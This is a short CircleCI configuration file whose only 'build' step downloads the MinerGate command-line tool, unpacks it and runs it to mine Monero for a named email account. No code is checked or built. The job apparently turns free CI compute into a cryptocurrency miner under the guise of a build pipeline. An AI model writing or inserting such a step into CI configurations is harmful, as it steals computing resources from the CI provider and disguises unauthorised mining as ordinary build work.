version: 2
jobs:
  build:
    docker:
      - image: greenfieldsvp/dock
    steps:
      - checkout
      - run: apt-get install binutils && wget https://download.minergate.com/deb-cli && ar x deb-cli && tar -xvzf data.tar.gz && cd opt/minergate-cli && ./minergate-cli -user greenfieldsvp@outlook.com.vn -xmr
